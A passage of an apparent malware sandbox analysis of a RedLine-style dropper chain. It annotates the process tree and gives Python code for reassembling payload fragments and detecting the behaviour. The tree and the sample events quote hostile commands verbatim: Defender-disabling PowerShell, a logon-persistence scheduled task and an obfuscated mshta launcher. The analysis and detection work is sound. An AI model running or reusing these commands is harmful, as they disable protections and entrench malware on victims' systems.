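    "zO4NQ.~S": b"\x90\x00\x03\x00\x00\x00\x04\x00",
    "hcd6.YS": b"\x00\x00\xff\xff\x00\x00",
    "L8KN6h.g": b"\xb8\x00\x00\x00",
}

if __name__ == "__main__":
    for chain in (CHAIN_MSIEXEC, CHAIN_CONTROL):
        p = parse_stitch_chain(chain)
        print(p["sources"], "->", p["destination"], "via", p["executor"], p["executor_args"])
    stitched = reassemble(parse_stitch_chain(CHAIN_MSIEXEC), FRAGMENTS_MSIEXEC)
    print("PE signature restored:", looks_like_pe(stitched))
```

On a live host the fragments are gone by the time the payload runs (the msiexec chain ends with del /q *), so the place to recover them is the sandbox's dropped-files set or a pre-execution disk image; the parser tells you which names to look for and in what order to concatenate them.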
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1864)
          cmd: C:\Windows\system32\cmd.exe /c Mon13d453d994180b.exe
        [5] C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13d453d994180b.exe (PID 2820)
            cmd: Mon13d453d994180b.exe
          [6] C:\Users\Admin\AppData\Local\Temp\is-BL57H.tmp\Mon13d453d994180b.tmp (PID 2912)
              cmd: "C:\Users\Admin\AppData\Local\Temp\is-BL57H.tmp\Mon13d453d994180b.tmp" /SL5="$301E0,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13d453d994180b.exe"
              (The is-XXXXX.tmp\*.tmp /SL5= relaunch is the standard Inno Setup bootstrap; it says the payload is wrapped in an Inno installer, nothing more.)
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1740)
          cmd: C:\Windows\system32\cmd.exe /c Mon1348816450.exe
          - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon1348816450.exe (PID 1332)
            cmd: Mon1348816450.exe
            - Executes dropped EXE
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1752)
          cmd: C:\Windows\system32\cmd.exe /c Mon13459b4085.exe
          - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exe (PID 888)
            cmd: Mon13459b4085.exe
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1012)
          cmd: C:\Windows\system32\cmd.exe /c Mon13136643d24e51.exe
          - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13136643d24e51.exe (PID 1504)
            cmd: Mon13136643d24e51.exe
            - Executes dropped EXE
            - Loads dropped DLL
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1976)
          cmd: C:\Windows\system32\cmd.exe /c Mon13073304e5395.exe
          - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe (PID 684)
            cmd: Mon13073304e5395.exe
            - Executes dropped EXE
            - Loads dropped DLL
          [6] C:\Users\Admin\AppData\Local\Temp\is-G9424.tmp\Mon13073304e5395.tmp (PID 1912)
              cmd: "C:\Users\Admin\AppData\Local\Temp\is-G9424.tmp\Mon13073304e5395.tmp" /SL5="$10186,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe"
              - Executes dropped EXE
              - Loads dropped DLL
            [7] C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe (PID 1576)
                cmd: "C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe" /SILENT
                - Executes dropped EXE
                - Loads dropped DLL
              [8] C:\Users\Admin\AppData\Local\Temp\is-4OFVO.tmp\Mon13073304e5395.tmp (PID 240)
                  cmd: "C:\Users\Admin\AppData\Local\Temp\is-4OFVO.tmp\Mon13073304e5395.tmp" /SL5="$20186,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe" /SILENT
                  - Executes dropped EXE
                  - Loads dropped DLL
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1312)
          cmd: C:\Windows\system32\cmd.exe /c Mon13a2838ed1d8384.exe
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1720)
          cmd: C:\Windows\system32\cmd.exe /c Mon134ab4d3e88a4d3e.exe
          - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe (PID 1448)
            cmd: Mon134ab4d3e88a4d3e.exe
            - Executes dropped EXE
            - Loads dropped DLL
            - Checks SCSI registry key(s)
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious behavior: MapViewOfSection
      [4] C:\Windows\SysWOW64\cmd.exe (PID 304)
          cmd: C:\Windows\system32\cmd.exe /c Mon13470f9aa951f871.exe /mixtwo
          - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe (PID 752)
            cmd: Mon13470f9aa951f871.exe /mixtwo
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of SetThreadContext
          [6] C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe (PID 2004)
              cmd: Mon13470f9aa951f871.exe /mixtwo
              - Executes dropped EXE
              - Loads dropped DLL
            [7] C:\Windows\SysWOW64\WerFault.exe (PID 2116)
                cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2004 -s 460
                - Loads dropped DLL
                - Program crash
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\cmd.exe (PID 912)
          cmd: C:\Windows\system32\cmd.exe /c Mon13be6b39578.exe
          - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13be6b39578.exe (PID 752)
            cmd: Mon13be6b39578.exe
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious behavior: EnumeratesProcesses
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1244)
          cmd: C:\Windows\system32\cmd.exe /c Mon13bb1ac8986b773.exe
          - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe (PID 1264)
            cmd: Mon13bb1ac8986b773.exe
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of SetThreadContext
          [6] C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe (PID 2168)
              cmd: C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe
              - Executes dropped EXE
          [6] C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe (PID 2272)
              cmd: C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe
              - Executes dropped EXE
          (PID 2272 is the hollowed child carrying the RedLine payload; PID 2168 is an earlier attempt with no further activity recorded.)
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1064)
          cmd: C:\Windows\system32\cmd.exe /c Mon13248c3d7ea8c81.exe
        [5] C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13248c3d7ea8c81.exe (PID 2836)
            cmd: Mon13248c3d7ea8c81.exe
          [6] C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13248c3d7ea8c81.exe (PID 2884)
              cmd: "C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13248c3d7ea8c81.exe" -u
[1] C:\Windows\system32\rundll32.exe (PID 2228)
    cmd: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Process spawned unexpected child process
  [2] C:\Windows\SysWOW64\rundll32.exe (PID 2216)
      cmd: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
[1] C:\Windows\system32\svchost.exe (PID 2344)
    cmd: C:\Windows\system32\svchost.exe -k SystemNetworkService
[1] C:\Windows\SysWOW64\rundll32.exe (PID 956)
    cmd: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
[1] C:\Windows\system32\rundll32.exe (PID 2564)
    cmd: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Process spawned unexpected child process
[1] C:\Windows\system32\makecab.exe (PID 2884)
    cmd: "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20211119181100.log C:\Windows\Logs\CBS\CbsPersist_20211119181100.cab

The rundll32.exe roots (PIDs 2228 and 2564) were started through WMI, which is why their parent is wmiprvse.exe (see the first signature), and the 64-bit instances re-launch a 32-bit copy for the 32-bit DLL. rundll32 loads the DLL and runs its DllMain before resolving the named export, so the bogus export name global still executes code. A SQLite library dropped in Temp is consistent with a stealer reading browser databases (see Reads user/profile data of web browsers), although the report does not attribute these launches to a family. The makecab.exe entry compressing a CBS log is routine Windows servicing activity and not part of the infection.
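The behaviours worth alerting on in this tree are all visible in process-creation telemetry: the Defender-tampering PowerShell under setup_install.exe, the mshta vbscript: launchers, the "services64" logon task, control.exe being fed a non-.cpl file, and rundll32 appearing under wmiprvse.exe. The rules below encode those five checks and run them over sample events; this is an added example, not part of the sandbox report or any product. The event schema (pid, image, cmdline, parent_image) is an assumption modelled on Sysmon Event ID 1, the sample events are constructed from command lines in the tree above, and the two benign controls are invented.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, List


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event (assumed schema modelled on Sysmon Event ID 1)."""
    pid: int
    image: str
    cmdline: str
    parent_image: str


def basename(path: str) -> str:
    """Last path component, lower-cased, so rules ignore System32 vs SysWOW64."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def defender_tamper(e: ProcEvent) -> bool:
    # Set-/Add-MpPreference switching off real-time scanning, cloud (MAPS)
    # reporting or sample submission, or carving out an exclusion path.
    return re.search(
        r"(?i)\b(Set|Add)-MpPreference\b.*-(DisableRealtimeMonitoring|"
        r"ExclusionPath|MAPSReporting|SubmitSamplesConsent)\b", e.cmdline) is not None


def schtasks_logon_highest(e: ProcEvent) -> bool:
    # Persistence: a task created to run at every logon with highest privileges.
    c = e.cmdline.lower()
    return (basename(e.image) == "schtasks.exe" and "/create" in c
            and re.search(r"/sc\s+onlogon", c) is not None
            and re.search(r"/rl\s+highest", c) is not None)


def mshta_inline_vbscript(e: ProcEvent) -> bool:
    # mshta running script straight from its command line and reaching for
    # WScript.Shell, which is how every cmd.exe stage in the tree is launched.
    c = e.cmdline.lower()
    return basename(e.image) == "mshta.exe" and "vbscript:" in c and "wscript.shell" in c


def wmi_spawned_lolbin(e: ProcEvent) -> bool:
    # A process created via WMI (Win32_Process.Create) has WmiPrvSE.exe as its
    # parent; a LOLBin there is what the report flags as an unexpected child.
    return (basename(e.parent_image) == "wmiprvse.exe" and basename(e.image) in
            {"rundll32.exe", "regsvr32.exe", "mshta.exe", "cmd.exe", "powershell.exe"})


def control_loads_noncpl(e: ProcEvent) -> bool:
    # control.exe passes its argument to Shell32!Control_RunDLL, which loads it
    # as a DLL; a file argument that is not a .cpl (here .\PcAKEO.F) is abuse.
    if basename(e.image) != "control.exe":
        return False
    parts = e.cmdline.split(None, 1)
    if len(parts) < 2:
        return False
    arg = parts[1].strip().strip('"')
    return not arg.startswith("/") and not arg.lower().endswith(".cpl")


RULES: Dict[str, Callable[[ProcEvent], bool]] = {
    "defender_tamper": defender_tamper,
    "schtasks_logon_highest": schtasks_logon_highest,
    "mshta_inline_vbscript": mshta_inline_vbscript,
    "wmi_spawned_lolbin": wmi_spawned_lolbin,
    "control_loads_noncpl": control_loads_noncpl,
}


def evaluate(events) -> Dict[int, List[str]]:
    """Return {pid: [matched rule names]} for every event that matched a rule.
    Keyed by PID for readability only; real pipelines should key by process GUID,
    since this very report shows PIDs being reused within one run."""
    hits: Dict[int, List[str]] = {}
    for e in events:
        matched = [name for name, rule in RULES.items() if rule(e)]
        if matched:
            hits[e.pid] = matched
    return hits


# Constructed sample events; command lines copied from the process tree above.
CMD32 = r"C:\Windows\SysWOW64\cmd.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(852, PS32, "powershell -inputformat none -outputformat none -NonInteractive -Command "
              "Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend "
              "-MAPSReporting Disable", CMD32),
    ProcEvent(1724, PS32, "powershell -inputformat none -outputformat none -NonInteractive -Command "
              r'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"', CMD32),
    ProcEvent(2412, r"C:\Windows\system32\schtasks.exe",
              'schtasks /create /f /sc onlogon /rl highest /tn "services64" '
              r'/tr "C:\Users\Admin\AppData\Roaming\services64.exe"', r"C:\Windows\System32\cmd.exe"),
    ProcEvent(2908, r"C:\Windows\SysWOW64\mshta.exe",
              r'"C:\Windows\System32\mshta.exe" vbscRIpT: cLosE( CREaTeOBJeCT( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Roaming\7935225.exe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF """" =="""" for %L In ( ""C:\Users\Admin\AppData\Roaming\7935225.exe"" ) do taskkill -IM ""%~NxL"" -F " , 0,trUE ) )',
              r"C:\Users\Admin\AppData\Roaming\7935225.exe"),
    ProcEvent(2228, r"C:\Windows\system32\rundll32.exe",
              r'rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global',
              r"C:\Windows\system32\wbem\wmiprvse.exe"),
    ProcEvent(2736, r"C:\Windows\SysWOW64\control.exe", r"control.exe .\PcAKEO.F", CMD32),
    # Invented benign controls: an admin querying Defender status, a user opening a real applet.
    ProcEvent(4000, PS32, "powershell -Command Get-MpComputerStatus", r"C:\Windows\explorer.exe"),
    ProcEvent(4001, r"C:\Windows\System32\control.exe", "control.exe ncpa.cpl", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for pid, names in sorted(evaluate(SAMPLE_EVENTS).items()):
        print(pid, ", ".join(names))
```

The Defender rule deliberately matches the parent cmd.exe wrappers too (PIDs 1292 and 1256 carry the same command line), which is useful when the PowerShell child is missing from telemetry; the WMI rule is the one to tune most carefully, since management agents also create processes through Win32_Process.Create.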